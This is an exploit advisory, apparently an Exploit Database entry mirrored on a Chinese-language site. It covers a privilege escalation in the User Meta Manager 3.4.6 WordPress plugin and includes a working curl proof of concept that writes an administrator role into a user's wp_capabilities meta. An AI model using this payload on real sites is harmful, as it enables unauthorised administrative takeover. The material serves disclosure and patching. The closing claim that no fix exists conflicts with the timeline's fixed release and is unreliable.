WordPress Plugin User Meta Manager 3.4.6 – Privilege Escalation

• Exploit Database
• 17 阅读

• 作者： Panagiotis Vagenas
  日期： 2016-02-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39411/

• * Exploit Title: WordPress User Meta Manager Plugin [Privilege Escalation]
  * Discovery Date: 2015/12/28
  * Public Disclosure Date: 2016/02/04
  * Exploit Author: Panagiotis Vagenas
  * Contact: https://twitter.com/panVagenas
  * Vendor Homepage: http://jasonlau.biz/home/
  * Software Link: https://wordpress.org/plugins/user-meta-manager/
  * Version: 3.4.6
  * Tested on: WordPress 4.4.1
  * Category: webapps
  
  Description
  ================================================================================
  
  User Meta Manager for WordPress plugin up to v3.4.6 suffers from a privilege 
  escalation vulnerability. A registered user can modify the meta information of 
  any registered user, including himself. This way he can modify `wp_capabilities`
  meta to escalate his account to a full privileged administrative account.
  
  PoC
  ================================================================================
  
  
  curl -c ${USER_COOKIES} \
   -d "mode=edit&umm_meta_value[]=a:1:{s:13:\"administrator\";b:1;}\
   &umm_meta_key[]=wp_capabilities" \
  "http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
  &umm_sub_action=umm_update_user_meta&umm_user=${USER_ID}"
  
  
  Timeline
  ================================================================================
  
  2015/12/28 - Discovered
  2015/12/29 - Vendor notified via support forums in WordPress.org
  2015/12/29 - Vendor notified via contact form in his site
  2016/01/29 - WordPress security team notified about the issue
  2016/02/02 - Vendor released version 3.4.7
  2016/02/02 - Verified that this exploit no longer applies in version 3.4.7
  
  Solution
  ================================================================================
  
  No official solution yet exists.